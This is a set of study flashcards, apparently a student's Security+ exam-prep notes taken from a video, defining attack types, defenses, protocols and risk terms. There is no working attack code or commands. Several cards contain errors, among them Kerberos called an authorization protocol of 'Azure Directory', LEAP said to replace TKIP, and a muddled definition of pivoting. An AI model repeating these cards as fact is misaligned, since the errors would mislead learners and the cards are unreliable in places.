Video Concepts I Didnt Know Flashcards
https://youtu.be/9Hd8QJmZQUc?t=7549 (152 cards)
1
Q
Pretexting
A
Social Engineering - an attacker tries to convincing a victim to give up information of value, or access to a system or service
2
Q
Principals for Social Engineering Success
A
Authority
Intimidation
Consensus-based - someone else, a peer has done this
Scarcity - lack of time or availability of an item
Familiarity-based - establish a personal connection
Trust - citing knowledge/experience, or no payment to establish a relationship
Urgency - time sensitivity
3
Q
XDR
A
Extended detection and response (XDR) collects threat data from previously siloed security tools across an organization’s technology stack for easier and faster investigation, threat hunting, and response.
4
Q
Worm
A
type of malware that spreads copies of itself from computer to computer, replicating itself without human interaction
5
Q
Fileless Virus
A
type of malware that does not rely on virus laden files to infect a host. Instead it exploits applications that are commonly used for legitimate and justified activity to execute malicious code in resident memory
6
Q
What is the most cost effective Ransomware countermeasure?
A
User Awareness Training
7
Q
Password Spraying
A
Attacker tries a password against many different accounts to avoid lockouts that typically come when brute forcing a single account
8
Q
Card Cloning
A
Focuses on capturing info from cards used for access, like RFID and magnetic stripe cards
9
Q
Tainting training data for ML
A
Data poising that supplies AI and ML algorithms with adversarial data that serves the attackers purposes or attacks against privacy
10
Q
Security of ML algorithms
A
Validate quality and security of data sources
Secure infrastructure and environment where AI and ML is hosted
Review, test and document changes to AI and ML algorithms
11
Q
AI
A
(Artificial Intelligence) focuses on smart tasks combining ML and deep learning to emulate human intelligence
12
Q
ML
A
(Machine Learning) a subset of AI, computer algorithms that improve automatically through experience and use of data
13
Q
Deep Learning
A
Sub-field of machine learning concerned with algorithms inspired by the structure and function of the brain called artifical neural networks
14
Q
Island Hopping Attack (Supply Chain)
A
Compromise a vulnerable vendor in an organization’s supply chain and then attempt to breach the target organization
15
Q
What defeats a replay attack?
A
Date/time stamps
16
Q
What attack can occur when a web app contains reflected input?
A
XSS (Cross site scripting)
17
Q
What can techniques can defend against XSS attacks?
A
Input validation and filtering. Validate data length and data type
18
Q
XSS
A
Cross Site Scripting
A type of injection in which malicious scripts are injected into otherwise benign and trusted websites.
Occur when an attacker uses a web application to send malicious code to a different user
Client side vulnerability
on OWASP list
usually covered by default by WAF
19
Q
XSRF / CSRF
A
similar to XSS, but exploits a different trust relationship; exploits trust that a user has in a website to execute code on the user’s computer
20
Q
What technique(s) can be used to defend against XSRF attacks?
A
Create web apps that use secure tokens, and sites that check the referring URL in requests to ensure it came from local site, and not some external source
21
Q
XML Injection
A
When users enter values that query XML (known as XPath) with values that take advantage of exploits, it is known as an XML injection attack.
XPath works in a similar manner to SQL, except that it does not have the same levels of access control,s so exploits can return entire documents
22
Q
What technique(s) can be used to defend against SQL Injection attacks?
A
Input validation
Use prepared statements (stored procs)
Limit Account privileges (SQL has gradual permission on SQL dbs)
23
Q
Deferencing
A
Taking away the reference and giving you what it was actually referring to
24
Q
Time of Check Time of Use (TICTOU)
A
timing vulnerability that occurs when a program checks access permissions too far in advance of a resource request (race condition)
25
What authentication system is frequently targetted by replay attacks?
Kerberos
26
Integer Overflow
Type of arithmetic overflow error when the result of an integer operation does not fit within the allocated memory space. Often leads to buffer overflows
27
Resource Exhaustion
When an application continuously allocated additional resource exhausting machine resources, leading the system to hang or crash
28
What is a tool that can be used to check for memory leaks?
Static Code Analyzer - checks to see if all memory allocation commands have a matching deallocation command
29
SSL Stripping Attack
aka SSL downgrading, also effects TLS
a technique by which a website is downgraded from https to http
How it works: must be 3 entities, Victim's system, secure web server, attack's system. An attacker intervvenes win the redirection from HTTP to HTTPS and intercepts the request from user to server. MITM attack
Can be prevented with enabling HTTPS on all pages and implementing HTTP Strict Transport Security (HSTS) which forces HTTPS on the browser
30
HSTS
HTTP Strict Transport Security: forces HTTPS on the browser
31
Refactoring
a set of techniques used to identify the flow and the modify the internal structure of code, without changing the code's visible behavior. Can be used for good or malicious purposes
32
Credential Guard
Windows 10 feature; encrypts password hash in memory, preventing a pass the hash attack
33
Pass the Hash vs Pass the Ticket
Pass the hash targets NTLM (New Technology Lan Manager)
Pass the ticket targets Kerberos
both Windows attacks
34
Bluebugging
Creates a backdoor attack before returning control of the phone to its owner
35
IV Attack
Initialization Vector; legacy attack; modifies the IV of an encrypted wireless packet during transmission. Enables attacker to compute the RC4 key stream generated by IV used and decrypt all other packets
36
DNS Spoofing
attacker sends false replies to a requesting system, beating the real reply from valid DNS server
37
What are some countermeasures to prevent DNS attacks?
allow only authorized changes to DNS
restrict zone transfers
using only verified forwarders
log all privileged DNS activity
38
Techniques used in Network based DDoS Attacks
uses botnets
UDP flooding
ICMP flooding
SYN flooding (from TCP handshake)
39
Domain Reputation
services and tools provide info as to whether a domain is a trusted email sender or is a source of spam mail
SPF (Text based DNS record, commonly used for email authentication, saying which servers are allowed to send email on behalf of your domain) and DMARC (allows domain owner to publish which servers are permitted to send email on behalf of your domain) DNS are commonly used to ensure email comes from approved senders
40
SPF
Text based DNS record, commonly used for email authentication, saying which servers are allowed to send email on behalf of your domain
41
DMARC
allows domain owner to publish their email authenication practices and to state what actions should be taken on mail that fails authentication checks
42
What are some Layer 2 attacks (OSI model)?
MAC Flooding
MAC Cloning
ARP Poising
43
What can prevent Collusion?
Separation of Duties
Job rotation
44
Where does Espionage originate from?
Externally
45
Where does Sabotage originate from?
Insiders, typically employees, or a trusted vendor
46
What are the countermeasures for the following Attack Vectors:
Direct Access
Wireless
Emails
Supply Chain
Social Media
Cloud
Direct Access - physical security
Wireless - secure WiFi networks
Emails - user tranining/phishing simulations
Supply Chain - vendor screening
Social Media - acceptable use policy
Cloud - CASB and config management
47
What are some OSINT sources?
Open Source Intelligence
threatcrowd.org
openphish.org
osintframework.com
48
What are some vulnerability databases?
www.shodan.io
NIST
National Vulnerability database, linked to CVEs, Common Vulnerabilities and Exposures
49
CISA
Cybersecurity and Infrastructure Security Agency
50
AIS
Automated Indicator Sharing - CISA capability, enables the real-time exchange of machine-readable cyber threat indicators and defensive measures. Free and can be plugged into SIEMs and Next Gen Firewalls
51
TTP
Tactics, Techniques and Procedures: behaviors, methods, tools and strategies that cyber threat actors and hackers use to plan and execute attacks on business networks.
aka, the why and how of cyber attacks, and guidance on response and prevention
52
Threat Hunting
dynamic process of seeking out cybersecurity threats inside your network from attackers and malware threats
53
Intelligence Fusion
involves industry and government; fusion centers in the US and abroad play an important role in countering cyber threats, attacks, and crime through gathering, analyzing, and sharing threat information
54
IoCs
Indicators of Compromise
55
Who issues Advisories and Bulletins?
Advisories are usually released by government-funded agencies
Bulletins are usually released by private companies
56
Maneuver
refers to a company's efforts to defend itself by disguising its systems, therebyt making it difficult for an attacker to successfully infiltrate
57
What will a non-credentialed scan find?
Things like missing patches and some protocol vulnerabilities. Will identify vulnerabilities that an attacker would easily find
58
SAST
Static Application Security Testing
requires access to source code
59
DAST
Dynamic Application Security Testing
does not require access to source code
60
CVSS
Common Vulnerability Scoring System; indicates severity
CVSS is not in the CVE listing, must look up in NVD, National Vulnerability Database; CVE list feeds into the NVD
61
NVD
National Vulnerability Database, maintained by NIST and synced with the MITRE list
62
SOAR
Security, Orchestration, Automation and Response: centralized alert and response automation with threat-specific playbooks. Response may be fully automated (AI) or single-click
63
UEBA
User Entity Behavioral Analysis - This is based on the interaction of a user that focuses on their identity and the data that they would normally access on a normal day.
It tracks the devices that the user normally uses and the servers they normally visit
64
MTTD
Mean (average) time to detection
65
SOC
Security Operations Center (Team)
66
White box test
also known as Known environment
67
Black box text
aka Unknown environment
68
Grey box test
aka partially known environment
69
Rules of Engagement
define the purpose of the pentest and what the scope will be for the people who are performing the test on the network. Date, time, systems and constraints will be listed in this
70
Pivoting
aka Island Hoping in Pentests; a compromised system is used to attack another compromised system on the same network, following the initial exploitation. If the compromise is introduced at a different time than the attack, it is is said to involve persistence
71
Footprinting
an ethical hacking technique used to gather as much data as possible about a specific targeted computer system, infrastructure, and networks to identify opportunities to penetrate them
72
Active footprinting examples
Ping sweet
Tracert analysis
Nmap
Extracting DNS info
73
Passive footprinting examples
browsing target website
Google search
Performing WHOIS lookup
Visiting social media profiles
74
Pseudo-Anonymization
de-identification procedure in which PII fields within a data recorded are replaced by one or more artificial identifiers, or pseudonyms
75
What are 3 ways to protect data at rest?
Storage Service Encryption (done by the service provider)
Full Disk Encryption
Transparent data encryption
76
Transparent data encryption (TDE)
used in SQL DBs and data warehouses; protects against threat of malicious activity with real-time encryption and decryption of db backups, transaction log files at rest without requiring app changes
77
Read through Test
Incident Response: copies of the IR plan is distributed to the team for review. Team provides feedback about updates needed to keep the plan current
78
Structured Walk-through
Incident Response: members of the DR team gather in a large conference room and role play a disaster scenario. The scenario us unknown except to the moderator. Team works together to document and discuss the appropriate response to the disaster
79
Simulation Test
Incident Response: similar to structured walkthru, except some of the items are tried/tested
80
SOA
Service Orientated Architecture
creation of discrete services that may be accessed by users in a black box fashion
81
Infrastructure as Code
IaC - mgmt of infrastructure (networks, VMs, load balancers, connection topology) described in code.
Just as the same source code generates the same binary, code in IaC model results in the same environment every time it is applied
82
SDN
Software Defined Network
enables the network to be intelligently and centrally controlled or programmed using software. Capacity to reporgram the data plane at any time
83
SDV
Software Defined Visibility - provides visibility of the network traffic use. Can collect and aggregate network traffic data and provide better reports to network admins
84
PaaS vs Serverless
Same:
- Devs have to write code
- No Server Management
Different
PaaS:
- more control over deployment environment
- Application has to be configured to auto-scale
- Application takes a while to spin up
Serverless
- less control over deployment environment
- application scales automatically
- Application code only executes when invoked
85
Resource Policies
policies that state what level of access someone has to data or a particular resource
86
Transit Gateway
a network hub that acts as a regional router to interconnect VPC and VPN connections
87
XOR
Exclusive OR, aka binary addition, element of secure coding; used in cryptography. function of flipping bits in a simple, systematic fashion
If original value and key value match, cipher value is 0
If original value and key value don't match, cipher value is 1
88
Attestation
process of confirming a device is an approved device compliant with company policies
common in zero trust architecture
89
Federation
collection of domains that have established trust; typically includes authentication and authorization
example: federate on-prem with Azure AD, and use this federation for authentication and authorization. This sign in method will ensure all user authentication occurs on-prem, and allows admins to implement more rigorous levels of access control
90
Multipathing
the establishment of multiple physical routes between a server and the storage device that supports it
91
NIC Teaming
pairing together dual network interface cards to give maximum throughout, Should one adapter fail, the other can ensure the server or client maintains connectivity. Supported by both windows and linux
92
PDU/MPDU
Power Distribution Unit/ (Managed)
can be controlled remotely if managed and provides clean power to multiple devices
93
SAN (networking)
Storage Area Network, a hardware devie that contains a large number of fast diusks, such as SSDs, usually isolated from the LAN on its own network
94
HBA
Host Bus Adapter: connects servers to storage device; using two HBAs with each node provides multiple paths
95
SAN Fabric
collection of servers, storage, switches and other devices. Redundant SAN fabrics would enable more robust redundancy
96
RTOS
Real time Operating System - runs in smart devices like wearables and embedded systems or industrial equipment
OS that deisngs to work on a very deterministic schedule; operates with very specific scheduling
Process data immediately and it if doesn't finish, the associated task or process fails
97
LiFi
Light Fidelity; uses the modulation of light intensity to transmit data (LED); Can safely function in areas otherwise susceptible to EM interference; can theoretically transmit at speeds of up to 100 GBit/s
Only requires working LED lights, but cannot penetrate opaque walls
98
Types of Physical Security Controls
Operational (aka Managerial or Administrative)
Logical (aka Technical)
Physical
99
Juice Jacking
When an unknown USB cable is connected to your device for power and an attacker uses it exfiltrate data form the device
100
PDS
Protected Distribution System - encases network cabling withing a carrier, enables data to be secure transferred between two high security areas through an area of lower security
Hardened carrier
Alarmed carrier
101
DSS
Digital Signature Standard
works in conjunction with one of 3 encryption algorithsm
DSA: Digital Signature Algorithm
Rivest, Shamir, Adleman (RSA) Algorithm
Elliptic Curve DSA (ECDSA) Algorithm
102
ECC
Elliptic Curve Cryptoghraphy (ECC)
a small fast key that is used for encryption in small mobile devices. Was created because of the constrains that we have associated with the calculations that we use in asymmetric encryption
Curves in ECC are easier to calculate than the large primes typical in asymmetric encryption
Attractive for resource constrained systems
103
Perfect Forward Secrecy
assures session keys will not be compromised if long-term secrets (private keys) used in a session key are compromised.
indicates that a cryptographic system generates random public keys for each session and does not use a deterministic algorithm; given the same input, the algorithm will create a different public key
Uses more computing power than a single private key
104
What keys does a certificate contain?
embedded public key matches to a private key
105
IPSec Modes
Transport Mode: IP addresses in outer header are used to determine the IPSec policy that will be applied to the packet; good for ESP host-to-host traffic
Tunnel Mode: two IP headers are sent. Inner IP packet determines the IPSec policy that protects it contents; good for VPNs and gateway-to-gateway security
106
DNS Record types for Security
SPF - Sender Policy Framework: text record used by DNS to prevent spam and confirm email came from domain it appears to come from
DMARC - Domain-based Message Authentication, Reporting and Conformance: DNS text recorded used by ISPs to prevent malicious email, such as phishing and spear phishing
107
DNSSEC
Prevents unauthorized access to DNS records on the server. Each DNS record is digitally signed, creating an RRSIG (digitally signed record) record to protect against attacks
108
Homograph Attack
leverages similarities in character sets to register phony international domain names (IDNs) that appear legitimate to the naked eye
109
Jump Server
lives in a screened subnet/DMZ, allows admins to connect remotely to do work
110
Inline (IDS/IPS Mode of Operation)
aka in-band: NIDS/NIPS placed on or near the firewall, as an additional layer of security
111
Passive (IDS/IPS Mode of Operation)
aka out-of-band; traffic does not go thru the NIPS/NIDS
112
Types of Firewalls
WAF: Web application firewall, protects web apps, can protect against attacks like XSS, CSRF, and SQL injection
NGFW: Next Gen; deep-packet inspection, moved beyond port/protocol inspection and blocking; adds app-level inspection, intrusion prevention and brings intelligence from outside the firewall
Deep Packet Inspection: inspects and filters headers and body; can protect against viruses, spam and malware, and instrusion
UTM Unified Threat Management: multi-fuction device, including a firewalls, IDS, IPS, TLS/SSL proxy, etc... Very common in SMB
113
Stateless
watch traffic, restrict or block packets based on source and destination addresses and other static values. Not aware of traffic patterns or data flows; Faster and performs better under heavy traffic loads
114
Stateful
Watch traffic streams from end to end; Aware of communication paths and can implement various IP security functions, such as tunnels and encryption
Better at identifying unauthorized and forged communications
115
Network Devices
Firewall: filter layer 3 thru 7
Switch: filter layer 2, sometimes 3
Routers: layer 3
Gateways: layer 3
116
OSI Model
Open Systems Interconnection
7- Application
6- Presentation
5- Session
4- Transport
3- Network
2- Data
1- Physical
bonus, data type:
4- Segments
3- Packets
2- Frames
1- Bites
117
ingress
inbound traffic
118
egress
outbound traffic
119
Wireless Cryptographic Protocols
TKIP: replacement for WEP; implemented into 802.11 under the name WPA
CCMP: Counter Mode with Cipher Block Chaining Message Authentication Code Protocol - created to replace WEP/TKIP; uses AES with 128-bit; used with WPA2
WPA2: see above
WPA3: uses 256-bit Galois/Counter Mode Protocol (GCMP-256); Personal and Enterprise
SAE: Simultaneous Authentication of Equals. Replaces WPA2-PSK, used in WP3; used Perfect Forward Secrey, uses Diffie Helman called dragonFly
120
Wireless Authentication Protocols
LEAP (lightweight EAP): developed by Cisco to replace TKIP
PEAP: (protected EAP) encapsulated EAP in a TLS tunnel, provides authentication and potentially encryption
EAP: (extensible authentication protocol) authentication framework, allows for new technologies to be compatible with existing tech
EAP-FAST: developed by Cicsoc, used in point-2-point connections, replaced LEAP cause it was insecure
EAP-TLS: secure authentication, requires X509 cert; needs three parties: supplicant (user device), authenticator and authentication server (RADIUS)
EAP-TTLS: uses two phases, first to set up secure session with a tunnel and certs; second phase use protocol such as MS-CHAP to complete session
121
802.1x
uses certificate authentication, can be used in conjunction with a RADIUS server for enterprise
122
IEEE 802.15
Bluetooth
123
Segmentation
security of services that are permitted to access or be accessible from other ones involves a strict set of rules controlling this traffic
Rules are enforced by the IP address ranges of each subnet
Within a private subnet, segmentation can be used to achieve departmental isolation
124
Next Gen SWG
Next Gen Secure Web Gateway: work at layer 7 (application layer) looking at actual traffic over the protocol to detect malicious intent; functions include web proxy, policy enforcement, malware detection, traffic inspection, data loss protection and URL filtering
125
Non-repudiation
The ability to prove a message was sent by a specific individual or an action was performed by a specific individual
126
Authentication Protocols
PAP: password authentication protocol; used by point-to-point protocol to validate users; considered weak
CHAP: Challenge Handshake Auth Protocol; user or network host to an authenticating entity; requires that both the client and server know the plaintext of the secret, though secret is not sent over the network
EAP: Extensible Auth Protocol; authentication framework
127
Common SSO standards
SAML
OAuth 2.0
OpenID
Also maybe not on exam:
SESAME
KryptoKnight
128
Kerberos
authorization protocol in Microsoft's Azure Directory (and is preferred to NTLM)
Stronger encryption, interoperability, and mutual authentication (client and server verified)
runs as a third-arty trusted server known as the Key Distribution Center (KDC)
Includes an authentication server, a ticket granting service and a database of secret keys for users and devices
passes around tickets instead of password hashes
helps prevent replay attacks through timestamps
129
Access Control Schemes
Non-Discretionary Access Control: eenables the enforcement of system-wide restrictions that override object-specific access control. (RBAC is considered non-discretionary)
Discretionary Access Control: every object has an owner that can grant or deny access to any other subject; use-based, user-centric; e.g.: NTFS
RBAC: Role Based Access Control
Rule Based Access Control
130
OCSP
Online Certificate Status Protocol: faster way to check certificate's status
131
CSR
Certificate Signing Request - the message that sent to the CA in order to get a digital certificate created
Records identifying information for a person or device that owns a private key and the corresponding public key
132
SAN (Certificates)
Subject alternative name: an extension to the X.509 spec that allows users to specify additional host names for a single SSL cert
Enables support for FQDNs from multiple domains in a single cert
133
Stapling
method used with OCSP which allows a web server to provice information on the validity of its own cert
Done by the web server essentially downloading the OCSP response from the cert vendor in advance and providing it to browsers
134
Pinning
method designed to mitigate the use of fraudulent certs. Once a public key or cert has been sen for a specific host, that key or cert is pinned to the host
If another cert is then seen, it could indicate a fraudulent cert
135
Key Escrow
addresses the possibility that the cryptographic key may be lost. Concerned with symmetric keys or private keys in asymmetric.
Key escrows are established to recover lost keys and allow decryption to resume
136
Certificate Chaining
refers to the fact that certificates are handled by a chain of trust
Root CA <- Subordinate CA <- Issuing (Intermediate) CA
137
NSLookup
tools for verifying the IP address of a hostname (DNS A record by default) in the DNS Server database
set type changes DNS record type
Dig in Linux
138
Hping
packet generators for TCP/IP, ofen used for auditing firewalls and networks.
139
MITRE ATT&CK Framework
Adversarial : this looks at the behavior of potential attackers who are put into different groups
Tactics: the medium by which (how) the attack will be carried out
Techniques: a breakdown of the processes of how an attack will be launched
& Common Knowledge: documentation relating to the attacker's tactics and techniques that have been made available to the general public
140
Cyber Kill Chain
traces stages of a cyber attack
1- Reconnaissance
2- Weaponization
3- Delivery
4- Exploitation
5- Installation
6- Command and Control
7- Actions On Objections
141
Diamond Model
Model of Intrusion Analysis
Adversary: threat actor group
Capabilities: where the adversary develops an exploit that they use to carry out the attack
Victim: the person targeted by the adversary
Infrastructure: This is how the attacker can get to the victim
142
Windows Logs
System: contains info about hardware changes, updates to devices,mm time sync, group policy application, etc..
Application: contains info about software applications, when launched, success, failure, and warnings about problems or errors
Security: contains info about successful logins as well as unauthorized attempts to access system and resources; captures info on file access and can determine who has downloaded certain data
143
Runbooks
Documents the human analyst response steps to an incident
144
Playbooks
The response automation to an incident
145
Order of Volatility
1- CPU, Cache, and register contents
2- Routing tables, ARP cache, process tables, kernel stats
3- Live network connections and data flows
4- RAM
5- Temp file system and swap/pagefile
6-Data on hard disk
7- Remotely logged data
8- Data stored on archival media/backups
146
ISO Frameworks
ISO 27001: International standard on how to manage information security
ISO 27002: Code of Practice for Information Security Controls, aims to improve the management of information
ISO 27701: extension on 27001/27002 - provides guidance on establishing, implementing, maintaining and continually improving a Privacy Information Management System (PIMS)
ISO 31000: provides principals, a framework and a process for managing risk for organizations of any size in any sector
147
Risk Types
External
Internal
Legacy Systems
Multiparty
IP (intellectual property) Theft
Software Compliance/Licensing
148
Residual Risk
Risk after controls are in place
149
Inherent Risk
Risk before controls are in place
150
Total Risk
Risk without controls
151
Quantitative Risk Analysis
assigns a dollar value to evaluate effectiveness of countermeasures
152
Qualitative Risk Analysis
Uses a scoring system to rank threats and effectiveness of countermeasures
